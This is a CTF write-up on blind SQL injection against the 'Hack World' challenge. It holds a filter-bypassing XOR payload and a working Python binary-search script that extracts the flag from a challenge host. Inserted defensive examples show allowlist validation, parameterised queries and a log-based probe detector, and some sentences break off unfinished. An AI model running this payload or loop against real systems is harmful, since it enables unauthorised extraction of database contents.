[CISCN2019 North China Division Day2 Web1] Hack World
Entering 1 or 2 gives the normal echo; entering a space returns bool(false); and entering other attack-style SQL statements displays
However, entering 1^1 still echoes normally.
So, combining this with boolean-based blind SQL injection, entering
1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))
also echoes normally.
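The probe above gets through because the check is a blacklist: it rejects a space and certain SQL keywords, but `^`, parentheses and `if()` remain available, so the spliced expression is still valid MySQL. As an added example that is not part of the write-up or the challenge, the Python below puts such a blacklist next to the fix a defender would apply: an allowlist that accepts only a decimal integer, and a parameterised query that binds the id as a value. The banned-word list is an assumption about the filter (the challenge source is not shown), and the SQLite `items` table with its "Hello" row is constructed for the demonstration.

```python
import re
import sqlite3

# The write-up's probe: the space is replaced by parentheses and XOR glues a
# boolean expression onto an otherwise valid id.
PROBE = "1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),0,1))"


def blacklist_ok(user_id: str) -> bool:
    """Challenge-style negative check (assumed word list): reject a space and a
    few keywords, accept everything else. This is the weak setting."""
    banned = (" ", "union", "or", "and", "--", "#")
    lowered = user_id.lower()
    return not any(word in lowered for word in banned)


def allowlist_ok(user_id: str) -> bool:
    """Positive check: an id is one or more decimal digits and nothing else."""
    return re.fullmatch(r"\d+", user_id) is not None


def lookup(conn: sqlite3.Connection, user_id: str):
    """Hardened lookup: validate first, then bind the id as a parameter so it
    can never be parsed as SQL. Returns the name, or None when rejected/absent."""
    if not allowlist_ok(user_id):
        return None
    row = conn.execute(
        "SELECT name FROM items WHERE id = ?", (int(user_id),)
    ).fetchone()
    return row[0] if row else None


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the challenge's lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "Hello"), (2, "World")])
    return conn


if __name__ == "__main__":
    db = demo_db()
    print("blacklist passes probe:", blacklist_ok(PROBE))   # True: the filter is bypassed
    print("allowlist passes probe:", allowlist_ok(PROBE))   # False: rejected before any SQL
    print("lookup('1') ->", lookup(db, "1"))
    print("lookup(PROBE) ->", lookup(db, PROBE))
```

The point of the contrast is that the blacklist has to anticipate every operator and function the database accepts, while the allowlist only has to describe the one shape a legitimate id takes; the parameter binding is the second layer in case the validation is ever loosened.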
PS: earlier I saw a senior player's
Afterwards this newbie borrowed the senior's binary-search code:
import requests

url = "http://6848dcc9-35e3-4a89-a9a0-0b96eaa95bd3.node3.buuoj.cn"
payload = {"id": ""}
result = ""

for i in range(1, 100):
    # Binary search over the printable ASCII range for the i-th character of the flag.
    # The lower bound is 32 (space): past the end of the flag substr() is empty and
    # ascii('') is 0, so the search converges to 32 and the outer loop can stop.
    l = 32
    r = 130
    mid = (l + r) >> 1
    while l < r:
        # 0^(cond) is 1 when cond holds, so the page echoes "Hello" exactly then.
        payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)
        html = requests.post(url, data=payload)
        print(payload)
        if "Hello" in html.text:
            l = mid + 1
        else:
            r = mid
        mid = (l + r) >> 1
    if chr(mid) == " ":
        break  # no more characters
    result = result + chr(mid)
    print(result)

print("flag: ", result)
The flag appears successfully.
Reference link:
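The loop above sends one request per comparison, so the flag is recovered from a long run of near-identical requests in which only the compared number changes. From the defending side that run is the thing to detect. The Python below is an added detection example, not part of the write-up: it parses constructed access-log lines (hypothetical host and client addresses; the script above used POST bodies, which a default access log does not record, so the probes here are modelled as GET query strings) and flags clients that send several requests whose `id` parameter carries a boolean probe or is not a plain integer.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (hypothetical clients, not the write-up's target).
# 10.0.0.5 models a binary-search loop: same probe, different compared value.
SAMPLE_LOG = """\
10.0.0.9 - - [01/Jan/2024:12:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /index.php?id=0%5E%28ascii%28substr%28%28select%28flag%29from%28flag%29%29%2C1%2C1%29%29%3E81%29 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /index.php?id=0%5E%28ascii%28substr%28%28select%28flag%29from%28flag%29%29%2C1%2C1%29%29%3E105%29 HTTP/1.1" 200 498
10.0.0.7 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php?id=1%5E%28if%28%281%3D1%29%2C0%2C1%29%29 HTTP/1.1" 200 498
10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php?id=0%5E%28ascii%28substr%28%28select%28flag%29from%28flag%29%29%2C1%2C1%29%29%3E93%29 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /index.php?id=2 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /index.php?id=0%5E%28ascii%28substr%28%28select%28flag%29from%28flag%29%29%2C1%2C1%29%29%3E99%29 HTTP/1.1" 200 498
"""

# Common log format: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Signatures of a boolean probe spliced onto a numeric id: XOR followed by a
# parenthesised expression, a character-extraction call, or a conditional.
PROBE_RE = re.compile(r"(?i)\^\s*\(|ascii\s*\(\s*substr\s*\(|\bif\s*\(")
# A legitimate id for this endpoint is a plain integer.
NUMERIC_RE = re.compile(r"\d+")


def id_param(path: str) -> str:
    """Return the percent-decoded ``id`` query parameter, or '' when absent."""
    return parse_qs(urlsplit(path).query).get("id", [""])[0]


def classify_line(line: str):
    """Return (ip, id_value, is_probe) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    value = id_param(m["path"])
    is_probe = bool(PROBE_RE.search(value)) or (
        value != "" and NUMERIC_RE.fullmatch(value) is None
    )
    return m["ip"], value, is_probe


def flagged_clients(lines=None, threshold: int = 3):
    """Group probe requests by client and keep clients at or above the threshold.

    Returns {ip: [decoded id values]}. One malformed id is noise; a run of them
    from a single client is the shape of a blind-injection loop."""
    lines = SAMPLE_LOG.splitlines() if lines is None else lines
    probes = defaultdict(list)
    for line in lines:
        parsed = classify_line(line)
        if parsed and parsed[2]:
            probes[parsed[0]].append(parsed[1])
    return {ip: vals for ip, vals in probes.items() if len(vals) >= threshold}


if __name__ == "__main__":
    for ip, vals in flagged_clients().items():
        print(f"{ip}: {len(vals)} probe requests, e.g. {vals[0]}")
```

The threshold is what separates a stray malformed request from the loop: a single odd id from 10.0.0.7 is recorded but not reported, while the four consecutive probes from 10.0.0.5 are. In production the same two signals (non-numeric id, probe signature) would feed a rate-based rule keyed on client and endpoint rather than a fixed count.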
https://blog.csdn.net/weixin_44077544/article/details/102669185